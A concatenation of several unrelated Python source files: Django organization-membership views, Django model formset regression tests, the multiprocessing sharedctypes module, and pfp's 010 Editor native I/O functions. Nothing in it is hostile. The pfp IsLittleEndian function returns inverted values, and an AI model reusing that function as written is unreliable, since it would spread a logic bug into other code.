'''
org = get_object_or_404( Organization, name=org )
user = get_object_or_404( User, username=user )
# Is the user this acceptance is for the current user?
if request.user != user:
return HttpResponse( status=404 )
# Great grab this user and toggle the pending variable
org_user = get_object_or_404( OrganizationUser,
user=user,
organization=org )
org_user.pending = False
org_user.save()
return HttpResponseRedirect(
reverse( 'user_dashboard',
kwargs={ 'username': user.username } ) )
@login_required
@require_GET
def organization_member_ignore( request, org, user ):
'''
Request a user become a member of an organization.
'''
org = get_object_or_404( Organization, name=org )
user = get_object_or_404( User, username=user )
# Is the user this acceptance is for the current user?
if request.user != user:
return HttpResponse( status=404 )
# Great grab this user and toggle the pending variable
org_user = get_object_or_404( OrganizationUser,
user=user,
organization=org )
org_user.delete()
return HttpResponseRedirect(
reverse( 'user_dashboard',
kwargs={ 'username': user.username } ) )
|
|
from __future__ import unicode_literals
from django import forms
from django.forms.formsets import BaseFormSet, DELETION_FIELD_NAME
from django.forms.utils import ErrorDict, ErrorList
from django.forms.models import modelform_factory, inlineformset_factory, modelformset_factory, BaseModelFormSet
from django.test import TestCase
from django.utils import six
from .models import User, UserSite, Restaurant, Manager, Network, Host
class InlineFormsetTests(TestCase):
def test_formset_over_to_field(self):
"A formset over a ForeignKey with a to_field can be saved. Regression for #10243"
Form = modelform_factory(User, fields="__all__")
FormSet = inlineformset_factory(User, UserSite, fields="__all__")
# Instantiate the Form and FormSet to prove
# you can create a form with no data
form = Form()
form_set = FormSet(instance=User())
# Now create a new User and UserSite instance
data = {
'serial': '1',
'username': 'apollo13',
'usersite_set-TOTAL_FORMS': '1',
'usersite_set-INITIAL_FORMS': '0',
'usersite_set-MAX_NUM_FORMS': '0',
'usersite_set-0-data': '10',
'usersite_set-0-user': 'apollo13'
}
user = User()
form = Form(data)
if form.is_valid():
user = form.save()
else:
self.fail('Errors found on form:%s' % form_set)
form_set = FormSet(data, instance=user)
if form_set.is_valid():
form_set.save()
usersite = UserSite.objects.all().values()
self.assertEqual(usersite[0]['data'], 10)
self.assertEqual(usersite[0]['user_id'], 'apollo13')
else:
self.fail('Errors found on formset:%s' % form_set.errors)
# Now update the UserSite instance
data = {
'usersite_set-TOTAL_FORMS': '1',
'usersite_set-INITIAL_FORMS': '1',
'usersite_set-MAX_NUM_FORMS': '0',
'usersite_set-0-id': six.text_type(usersite[0]['id']),
'usersite_set-0-data': '11',
'usersite_set-0-user': 'apollo13'
}
form_set = FormSet(data, instance=user)
if form_set.is_valid():
form_set.save()
usersite = UserSite.objects.all().values()
self.assertEqual(usersite[0]['data'], 11)
self.assertEqual(usersite[0]['user_id'], 'apollo13')
else:
self.fail('Errors found on formset:%s' % form_set.errors)
# Now add a new UserSite instance
data = {
'usersite_set-TOTAL_FORMS': '2',
'usersite_set-INITIAL_FORMS': '1',
'usersite_set-MAX_NUM_FORMS': '0',
'usersite_set-0-id': six.text_type(usersite[0]['id']),
'usersite_set-0-data': '11',
'usersite_set-0-user': 'apollo13',
'usersite_set-1-data': '42',
'usersite_set-1-user': 'apollo13'
}
form_set = FormSet(data, instance=user)
if form_set.is_valid():
form_set.save()
usersite = UserSite.objects.all().values().order_by('data')
self.assertEqual(usersite[0]['data'], 11)
self.assertEqual(usersite[0]['user_id'], 'apollo13')
self.assertEqual(usersite[1]['data'], 42)
self.assertEqual(usersite[1]['user_id'], 'apollo13')
else:
self.fail('Errors found on formset:%s' % form_set.errors)
def test_formset_over_inherited_model(self):
"A formset over a ForeignKey with a to_field can be saved. Regression for #11120"
Form = modelform_factory(Restaurant, fields="__all__")
FormSet = inlineformset_factory(Restaurant, Manager, fields="__all__")
# Instantiate the Form and FormSet to prove
# you can create a form with no data
form = Form()
form_set = FormSet(instance=Restaurant())
# Now create a new Restaurant and Manager instance
data = {
'name': "Guido's House of Pasta",
'manager_set-TOTAL_FORMS': '1',
'manager_set-INITIAL_FORMS': '0',
'manager_set-MAX_NUM_FORMS': '0',
'manager_set-0-name': 'Guido Van Rossum'
}
restaurant = User()
form = Form(data)
if form.is_valid():
restaurant = form.save()
else:
self.fail('Errors found on form:%s' % form_set)
form_set = FormSet(data, instance=restaurant)
if form_set.is_valid():
form_set.save()
manager = Manager.objects.all().values()
self.assertEqual(manager[0]['name'], 'Guido Van Rossum')
else:
self.fail('Errors found on formset:%s' % form_set.errors)
# Now update the Manager instance
data = {
'manager_set-TOTAL_FORMS': '1',
'manager_set-INITIAL_FORMS': '1',
'manager_set-MAX_NUM_FORMS': '0',
'manager_set-0-id': six.text_type(manager[0]['id']),
'manager_set-0-name': 'Terry Gilliam'
}
form_set = FormSet(data, instance=restaurant)
if form_set.is_valid():
form_set.save()
manager = Manager.objects.all().values()
self.assertEqual(manager[0]['name'], 'Terry Gilliam')
else:
self.fail('Errors found on formset:%s' % form_set.errors)
# Now add a new Manager instance
data = {
'manager_set-TOTAL_FORMS': '2',
'manager_set-INITIAL_FORMS': '1',
'manager_set-MAX_NUM_FORMS': '0',
'manager_set-0-id': six.text_type(manager[0]['id']),
'manager_set-0-name': 'Terry Gilliam',
'manager_set-1-name': 'John Cleese'
}
form_set = FormSet(data, instance=restaurant)
if form_set.is_valid():
form_set.save()
manager = Manager.objects.all().values().order_by('name')
self.assertEqual(manager[0]['name'], 'John Cleese')
self.assertEqual(manager[1]['name'], 'Terry Gilliam')
else:
self.fail('Errors found on formset:%s' % form_set.errors)
def test_formset_with_none_instance(self):
"A formset with instance=None can be created. Regression for #11872"
Form = modelform_factory(User, fields="__all__")
FormSet = inlineformset_factory(User, UserSite, fields="__all__")
# Instantiate the Form and FormSet to prove
# you can create a formset with an instance of None
form = Form(instance=None)
formset = FormSet(instance=None)
def test_empty_fields_on_modelformset(self):
"No fields passed to modelformset_factory should result in no fields on returned forms except for the id. See #14119."
UserFormSet = modelformset_factory(User, fields=())
formset = UserFormSet()
for form in formset.forms:
self.assertTrue('id' in form.fields)
self.assertEqual(len(form.fields), 1)
def test_save_as_new_with_new_inlines(self):
"""
Existing and new inlines are saved with save_as_new.
Regression for #14938.
"""
efnet = Network.objects.create(name="EFNet")
host1 = Host.objects.create(hostname="irc.he.net", network=efnet)
HostFormSet = inlineformset_factory(Network, Host, fields="__all__")
# Add a new host, modify previous host, and save-as-new
data = {
'host_set-TOTAL_FORMS': '2',
'host_set-INITIAL_FORMS': '1',
'host_set-MAX_NUM_FORMS': '0',
'host_set-0-id': six.text_type(host1.id),
'host_set-0-hostname': 'tranquility.hub.dal.net',
'host_set-1-hostname': 'matrix.de.eu.dal.net'
}
# To save a formset as new, it needs a new hub instance
dalnet = Network.objects.create(name="DALnet")
formset = HostFormSet(data, instance=dalnet, save_as_new=True)
self.assertTrue(formset.is_valid())
formset.save()
self.assertQuerysetEqual(
dalnet.host_set.order_by("hostname"),
["<Host: matrix.de.eu.dal.net>", "<Host: tranquility.hub.dal.net>"]
)
def test_initial_data(self):
user = User.objects.create(username="bibi", serial=1)
UserSite.objects.create(user=user, data=7)
FormSet = inlineformset_factory(User, UserSite, extra=2, fields="__all__")
formset = FormSet(instance=user, initial=[{'data': 41}, {'data': 42}])
self.assertEqual(formset.forms[0].initial['data'], 7)
self.assertEqual(formset.extra_forms[0].initial['data'], 41)
self.assertTrue('value="42"' in formset.extra_forms[1].as_p())
class FormsetTests(TestCase):
def test_error_class(self):
'''
Test the type of Formset and Form error attributes
'''
Formset = modelformset_factory(User, fields="__all__")
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '0',
'form-0-id': '',
'form-0-username': 'apollo13',
'form-0-serial': '1',
'form-1-id': '',
'form-1-username': 'apollo13',
'form-1-serial': '2',
}
formset = Formset(data)
# check if the returned error classes are correct
# note: formset.errors returns a list as documented
self.assertIsInstance(formset.errors, list)
self.assertIsInstance(formset.non_form_errors(), ErrorList)
for form in formset.forms:
self.assertIsInstance(form.errors, ErrorDict)
self.assertIsInstance(form.non_field_errors(), ErrorList)
def test_initial_data(self):
User.objects.create(username="bibi", serial=1)
Formset = modelformset_factory(User, fields="__all__", extra=2)
formset = Formset(initial=[{'username': 'apollo11'}, {'username': 'apollo12'}])
self.assertEqual(formset.forms[0].initial['username'], "bibi")
self.assertEqual(formset.extra_forms[0].initial['username'], "apollo11")
self.assertTrue('value="apollo12"' in formset.extra_forms[1].as_p())
def test_extraneous_query_is_not_run(self):
Formset = modelformset_factory(Network, fields="__all__")
data = {'test-TOTAL_FORMS': '1',
'test-INITIAL_FORMS': '0',
'test-MAX_NUM_FORMS': '',
'test-0-name': 'Random Place', }
with self.assertNumQueries(1):
formset = Formset(data, prefix="test")
formset.save()
class CustomWidget(forms.widgets.TextInput):
pass
class UserSiteForm(forms.ModelForm):
class Meta:
model = UserSite
fields = "__all__"
widgets = {
'id': CustomWidget,
'data': CustomWidget,
}
localized_fields = ('data',)
class Callback(object):
def __init__(self):
self.log = []
def __call__(self, db_field, **kwargs):
self.log.append((db_field, kwargs))
return db_field.formfield(**kwargs)
class FormfieldCallbackTests(TestCase):
"""
Regression for #13095 and #17683: Using base forms with widgets
defined in Meta should not raise errors and BaseModelForm should respect
the specified pk widget.
"""
def test_inlineformset_factory_default(self):
Formset = inlineformset_factory(User, UserSite, form=UserSiteForm, fields="__all__")
form = Formset().forms[0]
self.assertIsInstance(form['id'].field.widget, CustomWidget)
self.assertIsInstance(form['data'].field.widget, CustomWidget)
self.assertFalse(form.fields['id'].localize)
self.assertTrue(form.fields['data'].localize)
def test_modelformset_factory_default(self):
Formset = modelformset_factory(UserSite, form=UserSiteForm)
form = Formset().forms[0]
self.assertIsInstance(form['id'].field.widget, CustomWidget)
self.assertIsInstance(form['data'].field.widget, CustomWidget)
self.assertFalse(form.fields['id'].localize)
self.assertTrue(form.fields['data'].localize)
def assertCallbackCalled(self, callback):
id_field, user_field, data_field = UserSite._meta.fields
expected_log = [
(id_field, {'widget': CustomWidget}),
(user_field, {}),
(data_field, {'widget': CustomWidget, 'localize': True}),
]
self.assertEqual(callback.log, expected_log)
def test_inlineformset_custom_callback(self):
callback = Callback()
inlineformset_factory(User, UserSite, form=UserSiteForm,
formfield_callback=callback, fields="__all__")
self.assertCallbackCalled(callback)
def test_modelformset_custom_callback(self):
callback = Callback()
modelformset_factory(UserSite, form=UserSiteForm,
formfield_callback=callback)
self.assertCallbackCalled(callback)
class BaseCustomDeleteFormSet(BaseFormSet):
"""
A formset mix-in that lets a form decide if it's to be deleted.
Works for BaseFormSets. Also works for ModelFormSets with #14099 fixed.
form.should_delete() is called. The formset delete field is also suppressed.
"""
def add_fields(self, form, index):
super(BaseCustomDeleteFormSet, self).add_fields(form, index)
self.can_delete = True
if DELETION_FIELD_NAME in form.fields:
del form.fields[DELETION_FIELD_NAME]
def _should_delete_form(self, form):
return hasattr(form, 'should_delete') and form.should_delete()
class FormfieldShouldDeleteFormTests(TestCase):
"""
Regression for #14099: BaseModelFormSet should use ModelFormSet method _should_delete_form
"""
class BaseCustomDeleteModelFormSet(BaseModelFormSet, BaseCustomDeleteFormSet):
""" Model FormSet with CustomDelete MixIn """
class CustomDeleteUserForm(forms.ModelForm):
""" A model form with a 'should_delete' method """
class Meta:
model = User
fields = "__all__"
def should_delete(self):
""" delete form if odd PK """
return self.instance.pk % 2 != 0
NormalFormset = modelformset_factory(User, form=CustomDeleteUserForm, can_delete=True)
DeleteFormset = modelformset_factory(User, form=CustomDeleteUserForm, formset=BaseCustomDeleteModelFormSet)
data = {
'form-TOTAL_FORMS': '4',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '4',
'form-0-username': 'John',
'form-0-serial': '1',
'form-1-username': 'Paul',
'form-1-serial': '2',
'form-2-username': 'George',
'form-2-serial': '3',
'form-3-username': 'Ringo',
'form-3-serial': '5',
}
delete_all_ids = {
'form-0-DELETE': '1',
'form-1-DELETE': '1',
'form-2-DELETE': '1',
'form-3-DELETE': '1',
}
def test_init_database(self):
""" Add test data to database via formset """
formset = self.NormalFormset(self.data)
self.assertTrue(formset.is_valid())
self.assertEqual(len(formset.save()), 4)
def test_no_delete(self):
""" Verify base formset doesn't modify database """
# reload database
self.test_init_database()
# pass standard data dict & see none updated
data = dict(self.data)
data['form-INITIAL_FORMS'] = 4
data.update(dict(
('form-%d-id' % i, user.pk)
for i,user in enumerate(User.objects.all())
))
formset = self.NormalFormset(data, queryset=User.objects.all())
self.assertTrue(formset.is_valid())
self.assertEqual(len(formset.save()), 0)
self.assertEqual(len(User.objects.all()), 4)
def test_all_delete(self):
""" Verify base formset honors DELETE field """
# reload database
self.test_init_database()
# create data dict with all fields marked for deletion
data = dict(self.data)
data['form-INITIAL_FORMS'] = 4
data.update(dict(
('form-%d-id' % i, user.pk)
for i,user in enumerate(User.objects.all())
))
data.update(self.delete_all_ids)
formset = self.NormalFormset(data, queryset=User.objects.all())
self.assertTrue(formset.is_valid())
self.assertEqual(len(formset.save()), 0)
self.assertEqual(len(User.objects.all()), 0)
def test_custom_delete(self):
""" Verify DeleteFormset ignores DELETE field and uses form method """
# reload database
self.test_init_database()
# Create formset with custom Delete function
# create data dict with all fields marked for deletion
data = dict(self.data)
data['form-INITIAL_FORMS'] = 4
data.update(dict(
('form-%d-id' % i, user.pk)
for i,user in enumerate(User.objects.all())
))
data.update(self.delete_all_ids)
formset = self.DeleteFormset(data, queryset=User.objects.all())
# verify two were deleted
self.assertTrue(formset.is_valid())
self.assertEqual(len(formset.save()), 0)
self.assertEqual(len(User.objects.all()), 2)
# verify no "odd" PKs left
odd_ids = [user.pk for user in User.objects.all() if user.pk % 2]
self.assertEqual(len(odd_ids), 0)
|
|
#
# Module which supports allocation of ctypes objects from shared memory
#
# multiprocessing/sharedctypes.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
import ctypes
import weakref
from . import heap, RLock
from .forking import assert_spawning, ForkingPickler
__all__ = ['RawValue', 'RawArray', 'Value', 'Array', 'copy', 'synchronized']
typecode_to_type = {
'c': ctypes.c_char, 'u': ctypes.c_wchar,
'b': ctypes.c_byte, 'B': ctypes.c_ubyte,
'h': ctypes.c_short, 'H': ctypes.c_ushort,
'i': ctypes.c_int, 'I': ctypes.c_uint,
'l': ctypes.c_long, 'L': ctypes.c_ulong,
'f': ctypes.c_float, 'd': ctypes.c_double
}
def _new_value(type_):
size = ctypes.sizeof(type_)
wrapper = heap.BufferWrapper(size)
return rebuild_ctype(type_, wrapper, None)
def RawValue(typecode_or_type, *args):
'''
Returns a ctypes object allocated from shared memory
'''
type_ = typecode_to_type.get(typecode_or_type, typecode_or_type)
obj = _new_value(type_)
ctypes.memset(ctypes.addressof(obj), 0, ctypes.sizeof(obj))
obj.__init__(*args)
return obj
def RawArray(typecode_or_type, size_or_initializer):
'''
Returns a ctypes array allocated from shared memory
'''
type_ = typecode_to_type.get(typecode_or_type, typecode_or_type)
if isinstance(size_or_initializer, (int, long)):
type_ = type_ * size_or_initializer
obj = _new_value(type_)
ctypes.memset(ctypes.addressof(obj), 0, ctypes.sizeof(obj))
return obj
else:
type_ = type_ * len(size_or_initializer)
result = _new_value(type_)
result.__init__(*size_or_initializer)
return result
def Value(typecode_or_type, *args, **kwds):
'''
Return a synchronization wrapper for a Value
'''
lock = kwds.pop('lock', None)
if kwds:
raise ValueError('unrecognized keyword argument(s): %s' % kwds.keys())
obj = RawValue(typecode_or_type, *args)
if lock is False:
return obj
if lock in (True, None):
lock = RLock()
if not hasattr(lock, 'acquire'):
raise AttributeError("'%r' has no method 'acquire'" % lock)
return synchronized(obj, lock)
def Array(typecode_or_type, size_or_initializer, **kwds):
'''
Return a synchronization wrapper for a RawArray
'''
lock = kwds.pop('lock', None)
if kwds:
raise ValueError('unrecognized keyword argument(s): %s' % kwds.keys())
obj = RawArray(typecode_or_type, size_or_initializer)
if lock is False:
return obj
if lock in (True, None):
lock = RLock()
if not hasattr(lock, 'acquire'):
raise AttributeError("'%r' has no method 'acquire'" % lock)
return synchronized(obj, lock)
def copy(obj):
new_obj = _new_value(type(obj))
ctypes.pointer(new_obj)[0] = obj
return new_obj
def synchronized(obj, lock=None):
assert not isinstance(obj, SynchronizedBase), 'object already synchronized'
if isinstance(obj, ctypes._SimpleCData):
return Synchronized(obj, lock)
elif isinstance(obj, ctypes.Array):
if obj._type_ is ctypes.c_char:
return SynchronizedString(obj, lock)
return SynchronizedArray(obj, lock)
else:
cls = type(obj)
try:
scls = class_cache[cls]
except KeyError:
names = [field[0] for field in cls._fields_]
d = dict((name, make_property(name)) for name in names)
classname = 'Synchronized' + cls.__name__
scls = class_cache[cls] = type(classname, (SynchronizedBase,), d)
return scls(obj, lock)
#
# Functions for pickling/unpickling
#
def reduce_ctype(obj):
assert_spawning(obj)
if isinstance(obj, ctypes.Array):
return rebuild_ctype, (obj._type_, obj._wrapper, obj._length_)
else:
return rebuild_ctype, (type(obj), obj._wrapper, None)
def rebuild_ctype(type_, wrapper, length):
if length is not None:
type_ = type_ * length
ForkingPickler.register(type_, reduce_ctype)
obj = type_.from_address(wrapper.get_address())
obj._wrapper = wrapper
return obj
#
# Function to create properties
#
def make_property(name):
try:
return prop_cache[name]
except KeyError:
d = {}
exec(template % ((name, ) * 7), d)
prop_cache[name] = d[name]
return d[name]
template = '''
def get%s(self):
self.acquire()
try:
return self._obj.%s
finally:
self.release()
def set%s(self, value):
self.acquire()
try:
self._obj.%s = value
finally:
self.release()
%s = property(get%s, set%s)
'''
prop_cache = {}
class_cache = weakref.WeakKeyDictionary()
#
# Synchronized wrappers
#
class SynchronizedBase(object):
def __init__(self, obj, lock=None):
self._obj = obj
self._lock = lock or RLock()
self.acquire = self._lock.acquire
self.release = self._lock.release
def __reduce__(self):
assert_spawning(self)
return synchronized, (self._obj, self._lock)
def get_obj(self):
return self._obj
def get_lock(self):
return self._lock
def __repr__(self):
return '<%s wrapper for %s>' % (type(self).__name__, self._obj)
class Synchronized(SynchronizedBase):
value = make_property('value')
class SynchronizedArray(SynchronizedBase):
def __len__(self):
return len(self._obj)
def __getitem__(self, i):
self.acquire()
try:
return self._obj[i]
finally:
self.release()
def __setitem__(self, i, value):
self.acquire()
try:
self._obj[i] = value
finally:
self.release()
def __getslice__(self, start, stop):
self.acquire()
try:
return self._obj[start:stop]
finally:
self.release()
def __setslice__(self, start, stop, values):
self.acquire()
try:
self._obj[start:stop] = values
finally:
self.release()
class SynchronizedString(SynchronizedArray):
value = make_property('value')
raw = make_property('raw')
|
|
#!/usr/bin/env python
# encoding: utf-8
"""
This module of native functions is implemented for
compatability with 010 editor functions. Some of these functions
are nops, some are fully implemented.
"""
import six
import sys
from pfp.native import native
import pfp.fields
import pfp.errors as errors
import pfp.bitwrap as bitwrap
# http://www.sweetscape.com/010editor/manual/FuncIO.htm
# void BigEndian()
@native(name="BigEndian", ret=pfp.fields.Void)
def BigEndian(params, ctxt, scope, stream, coord):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
pfp.fields.NumberBase.endian = pfp.fields.BIG_ENDIAN
# void BitfieldDisablePadding()
@native(name="BitfieldDisablePadding", ret=pfp.fields.Void, send_interp=True)
def BitfieldDisablePadding(params, ctxt, scope, stream, coord, interp):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
interp.set_bitfield_padded(False)
# void BitfieldEnablePadding()
@native(name="BitfieldEnablePadding", ret=pfp.fields.Void, send_interp=True)
def BitfieldEnablePadding(params, ctxt, scope, stream, coord, interp):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
interp.set_bitfield_padded(True)
# void BitfieldLeftToRight()
@native(name="BitfieldLeftToRight", ret=pfp.fields.Void, send_interp=True)
def BitfieldLeftToRight(params, ctxt, scope, stream, coord, interp):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
interp.set_bitfield_direction(interp.BITFIELD_DIR_LEFT_RIGHT)
# void BitfieldRightToLeft()
@native(name="BitfieldRightToLeft", ret=pfp.fields.Void, send_interp=True)
def BitfieldRightToLeft(params, ctxt, scope, stream, coord, interp):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
interp.set_bitfield_direction(interp.BITFIELD_DIR_RIGHT_LEFT)
# double ConvertBytesToDouble( uchar byteArray[] )
@native(name="ConvertBytesToDouble", ret=pfp.fields.Double)
def ConvertBytesToDouble(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# float ConvertBytesToFloat( uchar byteArray[] )
@native(name="ConvertBytesToFloat", ret=pfp.fields.Float)
def ConvertBytesToFloat(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# hfloat ConvertBytesToHFloat( uchar byteArray[] )
@native(name="ConvertBytesToHFloat", ret=pfp.fields.Float)
def ConvertBytesToHFloat(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int ConvertDataToBytes( data_type value, uchar byteArray[] )
@native(name="ConvertDataToBytes", ret=pfp.fields.Int)
def ConvertDataToBytes(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void DeleteBytes( int64 start, int64 size )
@native(name="DeleteBytes", ret=pfp.fields.Void)
def DeleteBytes(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int DirectoryExists( string dir )
@native(name="DirectoryExists", ret=pfp.fields.Int)
def DirectoryExists(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int FEof()
@native(name="FEof", ret=pfp.fields.Int)
def FEof(params, ctxt, scope, stream, coord):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
# now that streams are _ALL_ BitwrappedStreams, we can use BitwrappedStream-specific
# functions
if stream.is_eof():
return 1
else:
return 0
# int64 FileSize()
@native(name="FileSize", ret=pfp.fields.Int64)
def FileSize(params, ctxt, scope, stream, coord):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
return stream.size()
# TFileList FindFiles( string dir, string filter )
@native(name="FindFiles", ret=pfp.fields.Void)
def FindFiles(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int FPrintf( int fileNum, char format[], ... )
@native(name="FPrintf", ret=pfp.fields.Int)
def FPrintf(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int FSeek( int64 pos )
@native(name="FSeek", ret=pfp.fields.Int)
def FSeek(params, ctxt, scope, stream, coord):
"""Returns 0 if successful or -1 if the address is out of range
"""
if len(params) != 1:
raise errors.InvalidArguments(
coord,
"{} args".format(len(params)),
"FSeek accepts only one argument",
)
pos = PYVAL(params[0])
curr_pos = stream.tell()
fsize = stream.size()
if pos > fsize:
stream.seek(fsize)
return -1
elif pos < 0:
stream.seek(0)
return -1
diff = pos - curr_pos
if diff < 0:
stream.seek(pos)
return 0
data = stream.read(diff)
# let the ctxt automatically append numbers, as needed, unless the previous
# child was also a skipped field
skipped_name = "_skipped"
if len(ctxt._pfp__children) > 0 and ctxt._pfp__children[
-1
]._pfp__name.startswith("_skipped"):
old_name = ctxt._pfp__children[-1]._pfp__name
data = ctxt._pfp__children[-1].raw_data + data
skipped_name = old_name
ctxt._pfp__children = ctxt._pfp__children[:-1]
del ctxt._pfp__children_map[old_name]
tmp_stream = bitwrap.BitwrappedStream(six.BytesIO(data))
new_field = pfp.fields.Array(len(data), pfp.fields.Char, tmp_stream)
ctxt._pfp__add_child(skipped_name, new_field, stream)
scope.add_var(skipped_name, new_field)
return 0
# int FSkip( int64 offset )
@native(name="FSkip", ret=pfp.fields.Int)
def FSkip(params, ctxt, scope, stream, coord):
"""Returns 0 if successful or -1 if the address is out of range
"""
if len(params) != 1:
raise errors.InvalidArguments(
coord,
"{} args".format(len(params)),
"FSkip accepts only one argument",
)
skip_amt = PYVAL(params[0])
pos = skip_amt + stream.tell()
return FSeek([pos], ctxt, scope, stream, coord)
# int64 FTell()
@native(name="FTell", ret=pfp.fields.Int64)
def FTell(params, ctxt, scope, stream, coord):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
return stream.tell()
# void InsertBytes( int64 start, int64 size, uchar value=0 )
@native(name="InsertBytes", ret=pfp.fields.Void)
def InsertBytes(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int IsBigEndian()
@native(name="IsBigEndian", ret=pfp.fields.Int)
def IsBigEndian(params, ctxt, scope, stream, coord):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
if pfp.fields.NumberBase.endian == pfp.fields.BIG_ENDIAN:
return 1
else:
return 0
# int IsLittleEndian()
@native(name="IsLittleEndian", ret=pfp.fields.Int)
def IsLittleEndian(params, ctxt, scope, stream, coord):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
if pfp.fields.NumberBase.endian == pfp.fields.LITTLE_ENDIAN:
return 0
else:
return 1
# void LittleEndian()
@native(name="LittleEndian", ret=pfp.fields.Void)
def LittleEndian(params, ctxt, scope, stream, coord):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
pfp.fields.NumberBase.endian = pfp.fields.LITTLE_ENDIAN
# int MakeDir( string dir )
@native(name="MakeDir", ret=pfp.fields.Int)
def MakeDir(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void OverwriteBytes( int64 start, int64 size, uchar value=0 )
@native(name="OverwriteBytes", ret=pfp.fields.Void)
def OverwriteBytes(params, ctxt, scope, stream, coord):
raise NotImplementedError()
def _read_data(params, stream, cls, coord):
bits = stream._bits
curr_pos = stream.tell()
if len(params) == 1:
pos = PYVAL(params[0])
stream.seek(pos, 0)
elif len(params) > 1:
raise errors.InvalidArguments(
coord, "at most 1 arguments", "{} args".format(len(params))
)
res = cls(stream=stream)
# reset the stream
stream.seek(curr_pos, 0)
stream._bits = bits
return res
# char ReadByte( int64 pos=FTell() )
@native(name="ReadByte", ret=pfp.fields.Char)
def ReadByte(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.Char, coord)
# double ReadDouble( int64 pos=FTell() )
@native(name="ReadDouble", ret=pfp.fields.Double)
def ReadDouble(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.Double, coord)
# float ReadFloat( int64 pos=FTell() )
@native(name="ReadFloat", ret=pfp.fields.Float)
def ReadFloat(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.Float, coord)
# hfloat ReadHFloat( int64 pos=FTell() )
@native(name="ReadHFloat", ret=pfp.fields.Float)
def ReadHFloat(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.Float, coord)
# int ReadInt( int64 pos=FTell() )
@native(name="ReadInt", ret=pfp.fields.Int)
def ReadInt(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.Int, coord)
# int64 ReadInt64( int64 pos=FTell() )
@native(name="ReadInt64", ret=pfp.fields.Int64)
def ReadInt64(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.Int64, coord)
# int64 ReadQuad( int64 pos=FTell() )
@native(name="ReadQuad", ret=pfp.fields.Int64)
def ReadQuad(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.Int64, coord)
# short ReadShort( int64 pos=FTell() )
@native(name="ReadShort", ret=pfp.fields.Short)
def ReadShort(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.Short, coord)
# uchar ReadUByte( int64 pos=FTell() )
@native(name="ReadUByte", ret=pfp.fields.UChar)
def ReadUByte(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.UChar, coord)
# uint ReadUInt( int64 pos=FTell() )
@native(name="ReadUInt", ret=pfp.fields.UInt)
def ReadUInt(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.UInt, coord)
# uint64 ReadUInt64( int64 pos=FTell() )
@native(name="ReadUInt64", ret=pfp.fields.UInt64)
def ReadUInt64(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.UInt64, coord)
# uint64 ReadUQuad( int64 pos=FTell() )
@native(name="ReadUQuad", ret=pfp.fields.UInt64)
def ReadUQuad(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.UInt64, coord)
# ushort ReadUShort( int64 pos=FTell() )
@native(name="ReadUShort", ret=pfp.fields.UShort)
def ReadUShort(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.UShort, coord)
# char[] ReadLine( int64 pos, int maxLen=-1, int includeLinefeeds=true )
@native(name="ReadLine", ret=pfp.fields.String)
def ReadLine(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void ReadBytes( uchar buffer[], int64 pos, int n )
@native(name="ReadBytes", ret=pfp.fields.Void)
def ReadBytes(params, ctxt, scope, stream, coord):
if len(params) != 3:
raise errors.InvalidArguments(
coord,
"3 arguments (buffer, pos, n)",
"{} args".format(len(params)),
)
if not isinstance(params[0], pfp.fields.Array):
raise errors.InvalidArguments(
coord, "buffer must be an array", params[0].__class__.__name__
)
if params[0].field_cls not in [pfp.fields.UChar, pfp.fields.Char]:
raise errors.InvalidArguments(
coord,
"buffer must be an array of uchar or char",
params[0].field_cls.__name__,
)
if not isinstance(params[1], pfp.fields.IntBase):
raise errors.InvalidArguments(
coord, "pos must be an integer", params[1].__class__.__name__
)
if not isinstance(params[2], pfp.fields.IntBase):
raise errors.InvalidArguments(
coord, "n must be an integer", params[2].__class__.__name__
)
bits = stream._bits
curr_pos = stream.tell()
vals = [
params[0].field_cls(stream) for x in six.moves.range(PYVAL(params[2]))
]
stream.seek(curr_pos, 0)
stream._bits = bits
params[0]._pfp__set_value(vals)
# char[] ReadString( int64 pos, int maxLen=-1 )
